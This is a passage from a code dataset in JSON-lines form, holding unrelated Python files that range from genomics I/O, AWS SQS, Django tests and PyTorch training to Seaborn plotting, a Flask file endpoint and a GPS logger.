downsample_fraction=downsample_fraction,\n random_seed=random_seed)\n except ImportError:\n raise ImportError(\n 'tfbam_lib module not found, cannot read .tfbam files.')\n else:\n index_mode = index_pb2.INDEX_BASED_ON_FILENAME\n if not use_index:\n index_mode = index_pb2.DONT_USE_INDEX\n\n aux_field_handling = reads_pb2.SamReaderOptions.SKIP_AUX_FIELDS\n if parse_aux_fields:\n aux_field_handling = reads_pb2.SamReaderOptions.PARSE_ALL_AUX_FIELDS\n\n if downsample_fraction:\n if not 0.0 < downsample_fraction <= 1.0:\n raise ValueError(\n 'downsample_fraction must be in the interval (0.0, 1.0]',\n downsample_fraction)\n\n if random_seed is None:\n # Fixed random seed produced with 'od -vAn -N4 -tu4 < /dev/urandom'.\n random_seed = 2928130004\n\n self._reader = sam_reader.SamReader.from_file(\n input_path.encode('utf8'),\n reads_pb2.SamReaderOptions(\n read_requirements=read_requirements,\n index_mode=index_mode,\n aux_field_handling=aux_field_handling,\n hts_block_size=(hts_block_size or 0),\n downsample_fraction=downsample_fraction,\n random_seed=random_seed))\n\n self.header = self._reader.header\n\n super(NativeSamReader, self).__init__()\n\n def iterate(self):\n return self._reader.iterate()\n\n def query(self, region):\n return self._reader.query(region)\n\n def __exit__(self, exit_type, exit_value, exit_traceback):\n self._reader.__exit__(exit_type, exit_value, exit_traceback)\n\n\nclass SamReader(genomics_reader.DispatchingGenomicsReader):\n \"\"\"Class for reading Read protos from SAM or TFRecord files.\"\"\"\n\n def _native_reader(self, input_path, **kwargs):\n return NativeSamReader(input_path, **kwargs)\n\n def _record_proto(self):\n return reads_pb2.Read\n\n\nclass NativeSamWriter(genomics_writer.GenomicsWriter):\n \"\"\"Class for writing to native SAM files.\n\n Most users will want SamWriter, which will write to either native SAM\n files or TFRecords files, based on the output filename's extensions.\n \"\"\"\n\n def __init__(self, output_path, header):\n \"\"\"Initializer for NativeSamWriter.\n\n Args:\n output_path: str. A path where we'll write our SAM/BAM file.\n header: A nucleus.SamHeader protobuf. The header is used both\n for writing the header, and to control the sorting applied to\n the rest of the file.\n \"\"\"\n raise NotImplementedError\n\n def write(self, proto):\n raise NotImplementedError\n\n def __exit__(self, exit_type, exit_value, exit_traceback):\n self._writer.__exit__(exit_type, exit_value, exit_traceback)\n\n\nclass SamWriter(genomics_writer.DispatchingGenomicsWriter):\n \"\"\"Class for writing Variant protos to SAM or TFRecord files.\"\"\"\n\n def _native_writer(self, output_path, header):\n return NativeSamWriter(output_path, header)\n","sub_path":"nucleus/io/sam.py","file_name":"sam.py","file_ext":"py","file_size_in_byte":7181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"163119515","text":"import boto3\nfrom botocore.exceptions import ClientError\n\nfrom handofcats import as_command\n\n\n@as_command\ndef run(*, queue_url: str):\n \"\"\"Exercise send_sqs_message()\"\"\"\n\n # Assign this value before running the program\n sqs_client = boto3.client(\"sqs\")\n\n # Send some SQS messages\n entries = []\n for i in range(1, 6):\n entries.append(\n {\"Id\": f\"m{i}\", \"MessageBody\": f\"SQS message #{i}\", \"DelaySeconds\": 10}\n )\n\n try:\n assert (\n entries\n ), \"!! An error occurred (AWS.SimpleQueueService.EmptyBatchRequest) when calling the SendMessageBatch operation: There should be at least one SendMessageBatchRequestEntry in the request.\"\n\n response = sqs_client.send_message_batch(QueueUrl=queue_url, Entries=entries)\n print(response)\n except ClientError as e:\n print(\"!!\", e)\n","sub_path":"daily/20200129/example_sqs/00sqs-batch-send.py","file_name":"00sqs-batch-send.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"554742936","text":"from django.test import TestCase\nfrom unittest.mock import patch\nfrom django.db.utils import OperationalError\nfrom django.core.management import call_command\n\nclass CommandTests(TestCase):\n def test_wait_for_db_read(self):\n '''\n Test waiting for db is available\n '''\n with patch('django.db.utils.ConnectionHandler.__getitem__') as gi:\n # In place of performing the action that above command run, we directly return True for it.\n gi.return_value = True\n call_command('wait_for_db')\n self.assertEqual(gi.call_count, 1)\n\n @patch('time.sleep', return_value=True)\n def test_wait_for_db(self, ts):\n '''\n Test waiting for db\n '''\n with patch('django.db.utils.ConnectionHandler.__getitem__') as gi:\n gi.side_effect = [OperationalError] * 5 + [True]\n call_command('wait_for_db')\n self.assertEqual(gi.call_count, 6)\n","sub_path":"core/tests/tests_commands.py","file_name":"tests_commands.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"326371654","text":"# expr_runner_ide.py\n#\n# experiment launcher for value iteration used in IDE\n# -----------------------\n\nfrom experiment_creater_and_resumer.experiment_creater_and_resumer import ExprCreaterAndResumer\nimport gridworldValueIteration\n\n\ndef run_expr():\n # agent parameters\n alpha = 0.2 # learning rate\n epsilon = 0.3 # exploration rate\n\n # learning environment parameters\n display_speed = 0.5\n discount = 0.9\n delta = 0.02\n\n # generate postfix\n postfix = ''\n postfix += '_valueIteration'\n postfix += '_alpha' + str(alpha)\n postfix += '_epsilon' + str(epsilon)\n postfix += '_speed' + str(display_speed)\n\n log_dir = '/Users/lguan/Documents/Study/Research/Summer 2018/experiment-logs'\n expr_saver = ExprCreaterAndResumer(rootdir=log_dir, postfix=postfix)\n\n # save experiment runner\n expr_saver.dump_src_code_and_model_def(fname=__file__)\n # save grid world related files\n expr_saver.dump_src_code_and_model_def(fname=gridworldValueIteration.__file__)\n\n # run experiment\n exprValueIteration = gridworldValueIteration.GridworldValueIterationExperiment(learning_rate=alpha, epsilon=epsilon\n , discount=discount, delta=delta\n , display_speed=display_speed)\n exprValueIteration.start()\n\n\nif __name__ == '__main__':\n run_expr()\n","sub_path":"experiment-logs/TAMER-robust-experiment/42_preferenceTAMERAgent_alpha0.3_epsilon0.05_policyConverge_autoFeedback_no0_wrong0_noise0.1_speed2.0/all_py_files_snapshot/experiment/expr_value_iteration_launcher_ide.py","file_name":"expr_value_iteration_launcher_ide.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"481854570","text":"\"\"\"Test v0x01.utils methods.\"\"\"\nfrom unittest import TestCase\nfrom unittest.mock import MagicMock, patch, PropertyMock\n\nfrom kytos.lib.helpers import get_switch_mock, get_connection_mock\nfrom napps.kytos.of_core.v0x01.utils import (send_desc_request, send_echo,\n say_hello, send_set_config,\n handle_features_reply)\n\nfrom tests.helpers import get_controller_mock\n\n\nclass TestUtils(TestCase):\n \"\"\"Test utils.\"\"\"\n\n def setUp(self):\n \"\"\"Execute steps before each tests.\"\"\"\n self.mock_controller = get_controller_mock()\n self.mock_switch = get_switch_mock('00:00:00:00:00:00:00:01', 0x01)\n self.mock_connection = get_connection_mock(0x01, self.mock_switch)\n\n @patch('napps.kytos.of_core.v0x01.utils.emit_message_out')\n def test_send_desc_request(self, mock_emit_message_out):\n \"\"\"Test send_desc_request.\"\"\"\n send_desc_request(self.mock_controller, self.mock_switch)\n mock_emit_message_out.assert_called()\n\n def test_handle_features_reply(self):\n \"\"\"test Handle features reply.\"\"\"\n mock_event = MagicMock()\n mock_features = MagicMock()\n mock_controller = MagicMock()\n self.mock_switch.get_interface_by_port_no.side_effect = [MagicMock(),\n False]\n type(mock_features).ports = PropertyMock(return_value=[MagicMock()])\n type(mock_event).content = PropertyMock(return_value={'message':\n mock_features})\n mock_controller.get_switch_or_create.return_value = self.mock_switch\n response = handle_features_reply(mock_controller, mock_event)\n self.assertEqual(self.mock_switch, response)\n self.assertEqual(self.mock_switch.update_features.call_count, 1)\n\n self.mock_switch.update_features.call_count = 0\n response = handle_features_reply(mock_controller, mock_event)\n self.assertEqual(self.mock_switch, response)\n self.assertEqual(self.mock_switch.update_features.call_count, 1)\n\n @patch('napps.kytos.of_core.v0x01.utils.emit_message_out')\n def test_send_echo(self, mock_emit_message_out):\n \"\"\"Test send_echo.\"\"\"\n send_echo(self.mock_controller, self.mock_switch)\n mock_emit_message_out.assert_called()\n\n @patch('napps.kytos.of_core.v0x01.utils.emit_message_out')\n def test_set_config(self, mock_emit_message_out):\n \"\"\"Test set_config.\"\"\"\n send_set_config(self.mock_controller, self.mock_switch)\n mock_emit_message_out.assert_called()\n\n @patch('napps.kytos.of_core.v0x01.utils.emit_message_out')\n def test_say_hello(self, mock_emit_message_out):\n \"\"\"Test say_hello.\"\"\"\n say_hello(self.mock_controller, self.mock_switch)\n mock_emit_message_out.assert_called()\n","sub_path":"tests/unit/v0x01/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"49711339","text":"import torch\n\nfrom tqdm import tqdm\nfrom utils.utils import cross_entropy_3d, dice\n\n\ndef train(model, loader, optimizer, logger, args, epoch, print_freq = 10):\n\tlosses = []\n\tdices = []\n\tmodel.train()\n\tfor i, batch in enumerate(loader):\n\t\tindex = batch['index']\n\t\tvolume = batch['image'].cuda()\n\t\tvolume = volume.view((-1,) + volume.shape[2:])\n\t\tlabel = batch['label'].cuda()\n\t\tlabel = label.view((-1,) + label.shape[2:])\n\t\toutput, _ = model(volume)\n\t\tloss = cross_entropy_3d(output, label)\n\n\t\toptimizer.zero_grad()\n\t\tloss.backward()\n\t\toptimizer.step()\n\n\t\tpred = output.argmax(dim = 1)\n\t\tlabel = label.squeeze(1)\n\t\td = dice(pred.cpu().data.numpy() == 1, label.cpu().data.numpy() == 1)\n\t\tdices.append(d)\n\t\tlosses.append(loss)\n\t\tlosses.append(loss.detach().cpu().item())\n\t\tif i % print_freq == 0:\n\t\t\ttqdm.write('[Epoch {}, {}/{}] loss: {}, dice: {}'.format(epoch, i, len(loader), loss.detach().cpu().item(), d))\n\n\t\t\tlogger.log(\"train/loss\", loss)\n\t\t\tlogger.log(\"train/dice\", d)\n\t\t\tlogger.step()\n\ttqdm.write(\"[Epoch {}] avg loss: {}, avg dice: {}\".format(epoch, sum(losses) / len(losses), sum(dices) / len(dices)))\n\n\tmodel.eval()\n\tdices = []\n\n\ndef validate(model, loader, optimizer, logger, saver, args, epoch):\n\tdices = []\n\tfor i, batch in enumerate(loader):\n\t\tindex = batch['index']\n\t\tvolume = batch['image'].cuda()\n\t\tvolume = volume.view((-1,) + volume.shape[2:])\n\t\tlabel = batch['label'].cuda()\n\t\tlabel = label.view((-1,) + label.shape[2:])\n\t\tlabel = label.squeeze(1)\n\t\toutput, _ = model(volume)\n\t\tpred = output.argmax(dim = 1)\n\t\td = dice(pred.cpu().data.numpy() == 1, label.cpu().data.numpy() == 1)\n\t\tdices.append(d)\n\t\tif args.local_rank == 0:\n\t\t\tlogger.log(\"test/dice\", d)\n\t\t\tsaver.save(epoch, {\n\t\t\t\t\t'state_dict': model.state_dict(),\n\t\t\t\t\t'dice': d,\n\t\t\t\t\t'optimizer_state_dict': optimizer.state_dict()\n\t\t\t\t}, d)\n\ttqdm.write(\"[Epoch {}] test avg dice: {}\".format(epoch, sum(dices) / len(dices)))\n","sub_path":"uda/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"249028615","text":"promedio = float(input(\"ingrese su promedio \"))\nmodalidad = \"pregrado\"\ncreditos = 0\ndescuento = 0\npodraMatricular = 1\n\n\nif modalidad == \"pregrado\":\n if promedio >= 4.5:\n creditos = 28\n descuento = 0.25\n elif promedio < 4.5 and promedio >= 4:\n creditos = 25\n descuento = 0.1\n elif promedio < 4 and promedio >= 3.5:\n creditos = 20\n descuento = 0\n elif promedio < 3.5 and promedio >= 2.5:\n creditos = 15\n descuento = 0\n elif promedio < 2.5:\n print(\"no podra matricularse\")\n podraMatricular = 0\nelse:\n if promedio >= 4.5:\n creditos = 20\n descuento = 0.2\n elif promedio < 4.5 and promedio >= 0:\n creditos = 10\n descuento = 0\n \nif podraMatricular == 1:\n if modalidad == \"pregrado\":\n print(\"creditos: \" + str(creditos) + \" total a pagar: \" + str(creditos* 50000))\n print(\"descuento: \" + str((creditos*50000)*descuento) + \" total con adescuento: \" + str((creditos*50000)*(1-descuento)))\n if modalidad == \"posgrado\":\n print(\"creditos: \" + str(creditos) + \" total a pagar: \" + str(creditos* 300000))\n print(\"descuento: \" + str((creditos*300000)*descuento) + \" total con descuento: \" + str((creditos*300000)*(1-descuento)))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"634348072","text":"import os\n\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\n\nclass MyEventHandler(FileSystemEventHandler):\n def __init__(self, filepath, callback):\n self.filepath = filepath\n self.callback = callback\n\n def on_any_event(self, event):\n if event.src_path == self.filepath:\n self.callback(filepath=self.filepath)\n\n\ndef filepath(filepath, callback):\n event_handler = MyEventHandler(filepath, callback)\n dirpath = os.path.dirname(filepath)\n observer = Observer()\n observer.schedule(event_handler, dirpath, recursive=True)\n observer.start()\n\n return observer\n","sub_path":"k8s-simple-rolling-update/v2/k8sru/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"630844753","text":"'''\n Solution loops through each element in the nums array and appends the element to all existing subsets and appends the new subset to our subset array.\n \n Time Complexity: O(2^n) where n is the number of elements in the array.\n'''\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n subset = [[]]\n for i in range(len(nums)):\n for j in range(len(subset)):\n currentSubset = subset[j].copy()\n currentSubset.append(nums[i])\n subset.append(currentSubset)\n\n return subset\n","sub_path":"Subsets/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"406915152","text":"from PyQt5 import QtCore\nfrom PyQt5.QtWidgets import *\n\n\nclass WriteInstructionDialog(QDialog):\n def __init__(self, parent=None, input_content='', arch='', mode=''):\n super(WriteInstructionDialog, self).__init__(parent)\n\n layout = QVBoxLayout(self)\n layout.addWidget(QLabel('insert instruction'))\n self.input_widget = QLineEdit(self)\n if len(input_content) > 0:\n self.input_widget.setText(input_content)\n self.input_widget.setMinimumWidth(350)\n layout.addWidget(self.input_widget)\n\n arch_mode_layout = QHBoxLayout()\n import keystone\n ks_objs = dir(keystone.keystone_const)\n\n self.arch = QComboBox(self)\n for w in ks_objs:\n if w.startswith('KS_ARCH_'):\n self.arch.addItem(w.replace('KS_ARCH_', '').lower())\n if w == arch:\n self.arch.setCurrentIndex(self.arch.count() - 1)\n arch_mode_layout.addWidget(self.arch)\n\n self.mode = QComboBox(self)\n for w in ks_objs:\n if w.startswith('KS_MODE_'):\n self.mode.addItem(w.replace('KS_MODE_', '').lower())\n if w == mode:\n self.mode.setCurrentIndex(self.mode.count() - 1)\n arch_mode_layout.addWidget(self.mode)\n\n layout.addLayout(arch_mode_layout)\n\n buttons = QHBoxLayout()\n ok = QPushButton('Ok')\n buttons.addWidget(ok)\n ok.clicked.connect(self.accept)\n cancel = QPushButton('cancel')\n cancel.clicked.connect(self.close)\n buttons.addWidget(cancel)\n layout.addLayout(buttons)\n\n def keyPressEvent(self, event):\n super(WriteInstructionDialog, self).keyPressEvent(event)\n if event.key() == QtCore.Qt.Key_Return:\n self.accept()\n\n @staticmethod\n def show_dialog(input_content='', arch='', mode=''):\n dialog = WriteInstructionDialog(input_content=input_content, arch=arch, mode=mode)\n result = dialog.exec_()\n\n return result == QDialog.Accepted, \\\n dialog.input_widget.text(), \\\n dialog.arch.currentText(), \\\n dialog.mode.currentText()\n","sub_path":"dwarf_debugger/ui/dialogs/dialog_write_instruction.py","file_name":"dialog_write_instruction.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"257857584","text":"# 1. створити файл\n# 2. прочитати\n# 3. змінити\n# 4. видалити\nfrom flask import Flask, request\nimport datetime\nimport os\nimport json\n\napp = Flask(__name__)\n\n\n@app.route('/file/task', methods=['GET', 'POST', 'PUT', 'DELETE'])\ndef file_tasks():\n if request.method == 'GET':\n \"\"\"get info from file\"\"\"\n path = \"/created_file.txt\"\n with open(path, \"r\") as file:\n return file.read()\n\n elif request.method == 'POST':\n \"\"\"create file\"\"\"\n dater = json.loads(request.data)\n data = f\"{dater}\\n\"\n with open('created_file.txt', \"w\") as new_file:\n new_file.write(data)\n return \"201\"\n elif request.method == \"PUT\":\n \"modify/update file\"\n dateti = json.loads(request.data)\n data = f\"{dateti}\\n\"\n with open('created_file.txt', \"a\") as new_file:\n new_file.write(data)\n return \"204\"\n elif request.method == 'DELETE':\n \"\"\"delete file\"\"\"\n os.remove(\"created_file.txt\")\n return \"204\"\n else:\n return '405'\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8080)\n","sub_path":"file_helper.py","file_name":"file_helper.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"177735692","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Nov 12 17:53:23 2017\r\n\r\n@author: feebr01\r\n\"\"\"\r\n\r\nimport seaborn as sns\r\n\r\n########## DISTRIBUTION PLOTS\r\n\r\ntips = sns.load_dataset('tips')\r\ntips.head()\r\n\r\nsns.distplot(tips['total_bill'])\r\n\r\n#Compare relationships good\r\nsns.jointplot(x='total_bill', y='tip', data=tips, kind='scatter')\r\nsns.pairplot(tips, hue = 'sex', palette = 'coolwarm')\r\n\r\nsns.rugplot(tips['total_bill'])\r\n\r\n\r\n#################CATEGORICAL DATA W VALUES\r\nimport numpy as np\r\nsns.barplot(x='sex',y='total_bill',data=tips, estimator =np.std)\r\n\r\nsns.countplot(x='sex', data = tips)\r\n\r\nsns.boxplot(x='day', y='total_bill',data = tips, hue ='smoker')\r\n\r\nsns.violinplot(x='day', y='total_bill',data = tips)\r\n\r\nsns.stripplot(x='day', y='total_bill',data = tips, jitter = True)\r\n\r\nsns.swarmplot(x='day', y='total_bill',data = tips)\r\n\r\n\r\n################### MATRIX PLOTS\r\nflights = sns.load_dataset('flights')\r\n\r\n\r\nsns.heatmap(tips.corr(), annot = True)\r\n\r\n#Pivot data and make heatmap\r\npvt = flights.pivot_table(index = 'month', columns = 'year', values = 'passengers')\r\nsns.heatmap(pvt, linecolor= 'white' ,lw=.2)\r\n\r\n\r\nsns.clustermap(pvt, cmap='coolwarm')\r\n\r\n\r\n################### REGRESSIONPLOTS\r\n\r\n#color dots by sex\r\nsns.lmplot(x='total_bill', y='tip', data=tips, hue = 'sex')\r\n\r\n#separate charts side by side by sex\r\nsns.lmplot(x='total_bill', y='tip', data=tips, col = 'sex')\r\n\r\n# size = , aspect = \r\n\r\n##############GRID\r\n\r\niris = sns.load_dataset('iris')\r\n\r\nsns.pairplot(iris)\r\n\r\ng = sns.PairGrid(iris)\r\n\r\n#separate by rows and columns, map is display\r\ng = sns.FacetGrid(data=tips, col = 'time', row ='smoker')\r\ng.map(sns.distplot, 'total_bill')\r\n\r\n####################STYLES AND COLORS\r\nsns.set_context('talk')\r\nsns.countplot(x='sex', data=tips)\r\n\r\nsns.lmplot(x= 'total_bill', y = 'tip', data = tips, hue = 'sex', palette='seismic' )\r\n\r\n\r\n\r\n\r\n","sub_path":"Udemy Seaborn.py","file_name":"Udemy Seaborn.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"35376479","text":"import json\n\nimport numpy as np\nimport statistics as sts\n\nimport extras.parser as parser\nimport extras.functions as functions\nimport extras.utils as utils\nimport perceptron.autoencoder as ae\n\nwith open(\"config.json\") as file:\n config = json.load(file)\n\n# static non changeable vars\nerror_threshold: float = config[\"error_threshold\"]\n\n# read the files and get the dataset. There is no need to normalize data at this exercise\nfull_dataset, _ = parser.read_file(config[\"file\"], config[\"system_threshold\"])\n\n# activation function and its derived\nact_funcs = functions.get_activation_functions(config[\"system\"], config[\"beta\"])\n\n# normalize data\nif config[\"normalize\"]:\n full_dataset = parser.normalize_data(full_dataset)\n\n# extract the last % of the dataset\ndataset, rest = parser.extract_subset(full_dataset, config[\"training_ratio\"])\n\n# initializes the auto-encoder\nauto_encoder = ae.AutoEncoder(*act_funcs, config[\"mid_layout\"], len(dataset[0]), config[\"latent_dim\"],\n config[\"momentum\"], config[\"alpha\"])\n\n# randomize w if asked\nif bool(config[\"randomize_w\"]):\n auto_encoder.randomize_w(config[\"randomize_w_ref\"], config[\"randomize_w_by_len\"])\n\nplot_bool = bool(config[\"plot\"])\n\n# initialize plotter\nif plot_bool:\n utils.init_plotter()\n\n# get pm from config\npm: float = config[\"denoising\"][\"pm\"]\n\n# use minimizer if asked\nif config[\"optimizer\"] != \"None\" and config[\"optimizer\"] != \"\":\n # randomize the dataset\n dataset = parser.randomize_data(dataset, config[\"data_random_seed\"])\n # train with minimize\n auto_encoder.train_minimizer(parser.add_noise_dataset(dataset, pm), dataset, config[\"trust\"], config[\"use_trust\"], config[\"optimizer\"], config[\"optimizer_iter\"], config[\"optimizer_fev\"])\n # plot error vs opt step\n utils.plot_values(range(len(auto_encoder.opt_err)), 'opt step', auto_encoder.opt_err, 'error', sci_y=False)\nelse:\n # vars for plotting\n ep_list = []\n err_list = []\n\n # train auto-encoder\n for ep in range(config[\"epochs\"]):\n\n # randomize the dataset everytime\n dataset = parser.randomize_data(dataset, config[\"data_random_seed\"])\n\n # train for this epoch\n for data in dataset:\n auto_encoder.train(parser.add_noise(data, pm), data, config[\"eta\"])\n\n # apply the changes\n auto_encoder.update_w()\n\n # calculate error\n error: float = auto_encoder.error(parser.add_noise_dataset(dataset, pm), dataset, config[\"trust\"], config[\"use_trust\"])\n if error < config[\"error_threshold\"]:\n break\n\n if ep % 50 == 0:\n print(f'Iteration {ep}, error {error}')\n\n # add error to list\n ep_list.append(ep)\n err_list.append(error)\n \n # plot error vs epoch\n if plot_bool:\n utils.plot_values(ep_list, 'epoch', err_list, 'error', sci_y=False)\n\n# labels for printing (use with full_dataset)\nlabels: [] = ['@', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', '[', '\\\\', ']', '^', '_']\n\nPM_ITER = 50\n\npm_values = [pm / 4, pm, pm * 2.5]\nx_superlist = []\nerr_superlist = []\nleg_list = ['pm=0,0625', 'pm=0,25', 'pm=0,625']\nfor pm_it in pm_values:\n err_mean: [] = []\n for data in full_dataset:\n aux: [] = []\n for i in range(PM_ITER):\n noisy_res = auto_encoder.activation(parser.add_noise(data, pm_it))\n aux.append(np.sum(abs(np.around(noisy_res[1:]) - data[1:])) / len(data[1:]))\n letter_err_mean = sts.mean(aux)\n err_mean.append(letter_err_mean)\n x_superlist.append(range(len(full_dataset)))\n err_superlist.append(err_mean)\n print(f'Using pm={pm_it}, error mean is {sts.mean(err_mean)}')\n\nif plot_bool:\n utils.plot_multiple_values(x_superlist, 'Letter', err_superlist, 'Invalid bits', leg_list, sci_y=False, xticks=labels, min_val_y=0, max_val_y=1)\n utils.plot_stackbars(x_superlist, 'Letter', err_superlist, 'Invalid bits', leg_list, sci_y=False, xticks=labels, min_val_y=0, max_val_y=1)\n\n # hold execution\n utils.hold_execution()\n","sub_path":"denoising.py","file_name":"denoising.py","file_ext":"py","file_size_in_byte":4089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"95923973","text":"#!/home/blogenv/bin/python\n# -*- coding: utf-8 -*-\nfrom django.shortcuts import render,get_object_or_404,redirect\nfrom blog.models import Post\nfrom .models import Comment\nfrom .forms import CommentForm\nfrom users.models import User\n\n# Create your views here.\n# 发布评论的视图函数\ndef post_comment(request,post_pk,user_pk):\n # 获得当前文章对象,登录的用户对象\n post=get_object_or_404(Post,pk=post_pk)\n user=get_object_or_404(User,pk=user_pk)\n # 如果为post方法\n if request.method=='POST':\n form=CommentForm(request.POST)\n # 如果表单内容合规\n if form.is_valid():\n # 创建评论对象,不保存到数据库\n comment=form.save(commit=False)\n\n comment.post=post\n comment.user=user\n\n # 保存评论表单数据到数据库,重定向当前页\n comment.save()\n return redirect(post)\n else:\n # 获得当前所有评论列表\n comment_list=post.comment_set.all()\n # 将当前页面表单内容,文章,评论列表保存后,重新渲染页面\n context={\n 'post':post,\n 'form':form,\n 'comment_list':comment_list\n }\n return render(request,'blog/detail.html',context=context)\n else:\n # get访问时,刷新页面\n return redirect(post)","sub_path":"comments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"581173268","text":"#!/usr/bin/python\r\n# _*_coding: utf-8 _*_\r\n\r\nimport os\r\nimport sys\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nurl = \"https://news.sina.com.cn/china/\" #IEEE.sh\r\nres = requests.get(url)\r\n\r\nres.encoding = 'utf-8'\r\n#soup = BeautifulSoup(res.text, 'lxml')\r\n#print(soup.title.text)\r\nsoup=BeautifulSoup(res.text,'html.parser')\r\n#print(soup.text)\r\nif os.path.exists(\"code/news.txt\"):\r\n os.remove(\"code/news.txt\")\r\ngetnews =\"\"\r\nfor news in soup.select(\".right-content\"):\r\n #print(news)\r\n #print (news.select(\"a\"))\r\n new_as=news.select(\"a\")\r\n for news_a in new_as:\r\n getnews = getnews + (news_a.text) +('\\n')\r\n\r\nprint(\"[+] 获取新闻(来自:\" + url +\"):\" )\r\nprint(getnews)\r\n\r\n\r\nwith open('code/news.txt','w') as f:\r\n f.write(getnews)","sub_path":"code/getnews.py","file_name":"getnews.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"420827866","text":"#! /usr/bin/python\n# Author: Nordine Sebkhi\n\nfrom gps import *\nfrom time import *\nimport time\nimport threading\nfrom datetime import datetime\nfrom math import cos, sin, radians, degrees, atan2\n\n\nclass GpsReader(threading.Thread):\n\n def __init__(self, outputDir):\n threading.Thread.__init__(self)\n self.gpsPoller = GpsPoller()\n self.outDir = outputDir\n\n def run(self):\n print(\"GPS: Connecting...\")\n self.gpsPoller.start()\n\n gpsFound = False\n prevLat = 0\n prevLon = 0\n bearing = 0\n\n while True:\n gpsData = self.gpsPoller.getCurrentValue()\n\n if (gpsData is not None and hasattr(gpsData, 'mode') and gpsData.mode == 3):\n\n # Get time stamp of current sample\n ts = datetime.now()\n\n # Create new file at each new data collection\n if not gpsFound:\n print(\"GPS : Connected!!\")\n gpsFound = True\n gpsFile = self.outDir + \"gps_{0}-{1}-{2}_{3}-{4}-{5}.csv\".format(\n ts.year, ts.month, ts.day, ts.hour, ts.minute, ts.second)\n\n with open(gpsFile, 'w') as f:\n f.write('LAT,LON,BEARING,ALT,SPEED,CLIMB,GPS_TIME,RPI_TIME\\n')\n\n # Append gps data\n timeGPS = gpsData.time\n lat = gpsData.lat # Degrees (North:+ South:-)\n lon = gpsData.lon # Degrees (East:+ West:-)\n alt = gpsData.alt # Meters\n speed = gpsData.speed # Meters per second\n climb = gpsData.climb # Climb(+) or Sink(-) in meters per second\n\n # Update Bearing\n if (prevLat != 0):\n bearing += self.getBearing(prevLat, prevLon, lat, lon)\n\n # Write results to output file\n with open(gpsFile, 'a') as f:\n f.write('{0},{1},{2},{3},{4},{5},{6},{7}\\n'.format(\n lat, lon, bearing, alt, speed, climb, timeGPS, ts))\n\n # Prepare for next iteration\n prevLat = lat\n prevLon = lon\n time.sleep(0.5)\n\n def getBearing(self, lat_start_deg, lon_start_deg, lat_end_deg, lon_end_deg):\n latStart = radians(lat_start_deg)\n lonStart = radians(lon_start_deg)\n latEnd = radians(lat_end_deg)\n lonEnd = radians(lon_end_deg)\n\n d_Lon = lonEnd - lonStart\n\n x = cos(latEnd) * sin(d_Lon)\n y = cos(latStart) * sin(latEnd) - sin(latStart) * cos(latEnd) * cos(d_Lon)\n\n bearingRad = atan2(x, y)\n return ((degrees(bearingRad) + 360.0) % 360)\n\n\nclass GpsPoller(threading.Thread):\n\n def __init__(self):\n threading.Thread.__init__(self)\n self.current_value = None\n\n def getCurrentValue(self):\n return self.current_value\n\n def run(self):\n\n gpsd = gps(mode=WATCH_ENABLE) # starting the stream of info\n\n try:\n while True:\n self.current_value = gpsd.next()\n\n except StopIteration:\n pass\n\n##################################\n# Test\n#############################\nif __name__ == \"__main__\":\n latStart = 39.099912\n lonStart = -94.581213\n latEnd = 38.627089\n lonEnd = -90.200203\n\n gpsReader = GpsReader(\"don't care'\")\n bearing = gpsReader.getBearing(latStart, lonStart, latEnd, lonEnd)\n print(\"Bearing (deg) = {0:f}\".format(bearing))","sub_path":"gpsReader.py","file_name":"gpsReader.py","file_ext":"py","file_size_in_byte":3491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"169073929","text":"from PIL import Image, ImageDraw\nfrom random import randint, randrange, choice\nimport sys\nsys.setrecursionlimit(2000)\n\nclass Data:\n def __init__(self, file):\n self.file = file\n self.list_of_rows = []\n with open(self.file) as data:\n for line in data.readlines():\n self.list_of_rows.append([int(num) for num in line.split()])\n self.width = 